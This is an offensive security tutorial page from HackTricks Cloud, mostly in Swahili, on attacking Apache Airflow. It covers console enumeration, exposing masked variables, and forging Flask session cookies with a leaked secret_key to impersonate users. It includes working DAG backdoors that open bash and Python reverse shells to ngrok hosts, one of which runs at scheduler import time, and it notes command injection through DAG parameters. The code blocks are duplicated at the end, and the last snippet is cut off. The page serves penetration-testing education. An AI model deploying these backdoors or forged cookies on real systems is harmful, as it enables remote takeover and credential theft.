Apache Airflow Security

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Basic Information

Apache Airflow inatumika kama jukwaa la kuandaa na kupanga mipango ya data au kazi. Neno "kuandaa" katika muktadha wa mipango ya data linaashiria mchakato wa kupanga, kuratibu, na kusimamia kazi ngumu za data zinazotokana na vyanzo mbalimbali. Lengo kuu la mipango hii ya data iliyopangwa ni kutoa seti za data zilizopangwa na zinazoweza kutumika. Seti hizi za data zinatumika sana na maelfu ya programu, ikiwa ni pamoja na lakini sio tu zana za akili ya biashara, sayansi ya data na mifano ya kujifunza mashine, ambazo zote ni msingi wa utendaji wa programu za big data.

Kwa msingi, Apache Airflow itakuruhusu kupanga utekelezaji wa msimbo wakati kitu (tukio, cron) kinatokea.

Local Lab

Docker-Compose

Unaweza kutumia faili ya usanidi ya docker-compose kutoka https://raw.githubusercontent.com/apache/airflow/main/docs/apache-airflow/start/docker-compose.yaml kuanzisha mazingira kamili ya apache airflow docker. (Ikiwa uko kwenye MacOS hakikisha unatoa angalau 6GB ya RAM kwa VM ya docker).

Minikube

Njia rahisi moja ya kufanya kazi apache airflow ni kuikimbia na minikube:

helm repo add airflow-stable https://airflow-helm.github.io/charts
helm repo update
helm install airflow-release airflow-stable/airflow
# Some information about how to aceess the web console will appear after this command

# Use this command to delete it
helm delete airflow-release

Airflow Configuration

Airflow inaweza kuhifadhi taarifa nyeti katika usanidi wake au unaweza kupata usanidi dhaifu ulio katika nafasi:

Airflow Configuration

Airflow RBAC

Kabla ya kuanza kushambulia Airflow unapaswa kuelewa jinsi ruhusa zinavyofanya kazi:

Airflow RBAC

Attacks

Web Console Enumeration

Ikiwa una ufikiaji wa console ya wavuti unaweza kuwa na uwezo wa kufikia baadhi au yote ya taarifa zifuatazo:

Variables (Taarifa nyeti za kawaida zinaweza kuhifadhiwa hapa)
Connections (Taarifa nyeti za kawaida zinaweza kuhifadhiwa hapa)
Fikia kwenye http://<airflow>/connection/list/
Configuration (Taarifa nyeti kama secret_key na nywila zinaweza kuhifadhiwa hapa)
Orodha ya watumiaji & majukumu
Code ya kila DAG (ambayo inaweza kuwa na taarifa za kuvutia)

Retrieve Variables Values

Variables zinaweza kuhifadhiwa katika Airflow ili DAGs ziweze kufikia thamani zao. Ni sawa na siri za majukwaa mengine. Ikiwa una ruhusa za kutosha unaweza kuzifikia kwenye GUI katika http://<airflow>/variable/list/. Airflow kwa kawaida itaonyesha thamani ya variable kwenye GUI, hata hivyo, kulingana na hii inawezekana kuweka orodha ya variables ambazo thamani zitakuwa zinaonekana kama asterisks katika GUI.

Hata hivyo, hizi thamani bado zinaweza kupatikana kupitia CLI (unahitaji kuwa na ufikiaji wa DB), kutekeleza DAG isiyo na mipaka, API inayofikia mwisho wa variables (API inahitaji kuwezeshwa), na hata GUI yenyewe! Ili kufikia hizo thamani kutoka kwenye GUI chagua tu variables unazotaka kufikia na bonyeza kwenye Actions -> Export. Njia nyingine ni kufanya bruteforce kwa thamani iliyofichwa kwa kutumia uchujaji wa utafutaji hadi upate:

Privilege Escalation

Ikiwa usanidi wa expose_config umewekwa kuwa True, kutoka jukumu la Mtumiaji na juu wanaweza kusoma config kwenye wavuti. Katika usanidi huu, secret_key inaonekana, ambayo inamaanisha mtumiaji yeyote mwenye hii halali wanaweza kuunda cookie yao iliyosainiwa ili kujifanya kuwa akaunti nyingine yoyote ya mtumiaji.

flask-unsign --sign --secret '<secret_key>' --cookie "{'_fresh': True, '_id': '12345581593cf26619776d0a1e430c412171f4d12a58d30bef3b2dd379fc8b3715f2bd526eb00497fcad5e270370d269289b65720f5b30a39e5598dad6412345', '_permanent': True, 'csrf_token': '09dd9e7212e6874b104aad957bbf8072616b8fbc', 'dag_status_filter': 'all', 'locale': 'en', 'user_id': '1'}"

DAG Backdoor (RCE katika Airflow worker)

Ikiwa una ufikiaji wa kuandika mahali ambapo DAGs zimehifadhiwa, unaweza tu kuunda moja ambayo itakutumia reverse shell. Kumbuka kwamba reverse shell hii itatekelezwa ndani ya airflow worker container:

import pendulum
from airflow import DAG
from airflow.operators.bash import BashOperator

with DAG(
dag_id='rev_shell_bash',
schedule_interval='0 0 * * *',
start_date=pendulum.datetime(2021, 1, 1, tz="UTC"),
) as dag:
run = BashOperator(
task_id='run',
bash_command='bash -i >& /dev/tcp/8.tcp.ngrok.io/11433  0>&1',
)

import pendulum, socket, os, pty
from airflow import DAG
from airflow.operators.python import PythonOperator

def rs(rhost, port):
s = socket.socket()
s.connect((rhost, port))
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
pty.spawn("/bin/sh")

with DAG(
dag_id='rev_shell_python',
schedule_interval='0 0 * * *',
start_date=pendulum.datetime(2021, 1, 1, tz="UTC"),
) as dag:
run = PythonOperator(
task_id='rs_python',
python_callable=rs,
op_kwargs={"rhost":"8.tcp.ngrok.io", "port": 11433}
)

DAG Backdoor (RCE katika Airflow scheduler)

Ikiwa utaweka kitu kifanyike katika mzizi wa msimbo, wakati wa kuandika hii, kita fanywa na scheduler baada ya sekunde chache baada ya kukiweka ndani ya folda ya DAG.

import pendulum, socket, os, pty
from airflow import DAG
from airflow.operators.python import PythonOperator

def rs(rhost, port):
s = socket.socket()
s.connect((rhost, port))
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
pty.spawn("/bin/sh")

rs("2.tcp.ngrok.io", 14403)

with DAG(
dag_id='rev_shell_python2',
schedule_interval='0 0 * * *',
start_date=pendulum.datetime(2021, 1, 1, tz="UTC"),
) as dag:
run = PythonOperator(
task_id='rs_python2',
python_callable=rs,
op_kwargs={"rhost":"2.tcp.ngrok.io", "port": 144}

Uundaji wa DAG

Ikiwa utafanikiwa kushambulia mashine ndani ya klasta ya DAG, unaweza kuunda scripts za DAG mpya katika folda ya dags/ na zitakuwa zinakopiwa katika mashine nyingine ndani ya klasta ya DAG.

Uingiliaji wa Kode ya DAG

Unapotekeleza DAG kutoka kwa GUI unaweza kupitisha hoja kwake. Hivyo, ikiwa DAG haijakodishwa vizuri inaweza kuwa na udhaifu wa Uingiliaji wa Amri. Hivyo ndivyo ilivyotokea katika CVE hii: https://www.exploit-db.com/exploits/49927

Kila unachohitaji kujua ili kuanza kutafuta uingiliaji wa amri katika DAGs ni kwamba parameta zinapatikana kwa kode dag_run.conf.get("param_name").

Zaidi ya hayo, udhaifu sawa unaweza kutokea na mabadiliko (zingatia kwamba kwa ruhusa ya kutosha unaweza kudhibiti thamani ya mabadiliko katika GUI). Mabadiliko yanapatikana kwa:

from airflow.models import Variable
[...]
foo = Variable.get("foo")

Ikiwa zinatumika kwa mfano ndani ya amri ya bash, unaweza kufanya uingizaji wa amri.

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au fuata sisi kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

PreviousJenkins Dumping Secrets from Groovy NextAirflow Configuration

Last updated 3 days ago

helm repo add airflow-stable https://airflow-helm.github.io/charts helm repo update helm install airflow-release airflow-stable/airflow # Some information about how to aceess the web console will appear after this command # Use this command to delete it helm delete airflow-release

flask-unsign --sign --secret '<secret_key>' --cookie "{'_fresh': True, '_id': '12345581593cf26619776d0a1e430c412171f4d12a58d30bef3b2dd379fc8b3715f2bd526eb00497fcad5e270370d269289b65720f5b30a39e5598dad6412345', '_permanent': True, 'csrf_token': '09dd9e7212e6874b104aad957bbf8072616b8fbc', 'dag_status_filter': 'all', 'locale': 'en', 'user_id': '1'}"

import pendulum from airflow import DAG from airflow.operators.bash import BashOperator with DAG( dag_id='rev_shell_bash', schedule_interval='0 0 * * *', start_date=pendulum.datetime(2021, 1, 1, tz="UTC"), ) as dag: run = BashOperator( task_id='run', bash_command='bash -i >& /dev/tcp/8.tcp.ngrok.io/11433 0>&1', )

import pendulum, socket, os, pty from airflow import DAG from airflow.operators.python import PythonOperator def rs(rhost, port): s = socket.socket() s.connect((rhost, port)) [os.dup2(s.fileno(),fd) for fd in (0,1,2)] pty.spawn("/bin/sh") with DAG( dag_id='rev_shell_python', schedule_interval='0 0 * * *', start_date=pendulum.datetime(2021, 1, 1, tz="UTC"), ) as dag: run = PythonOperator( task_id='rs_python', python_callable=rs, op_kwargs={"rhost":"8.tcp.ngrok.io", "port": 11433} )

import pendulum, socket, os, pty from airflow import DAG from airflow.operators.python import PythonOperator def rs(rhost, port): s = socket.socket() s.connect((rhost, port)) [os.dup2(s.fileno(),fd) for fd in (0,1,2)] pty.spawn("/bin/sh") rs("2.tcp.ngrok.io", 14403) with DAG( dag_id='rev_shell_python2', schedule_interval='0 0 * * *', start_date=pendulum.datetime(2021, 1, 1, tz="UTC"), ) as dag: run = PythonOperator( task_id='rs_python2', python_callable=rs, op_kwargs={"rhost":"2.tcp.ngrok.io", "port": 144}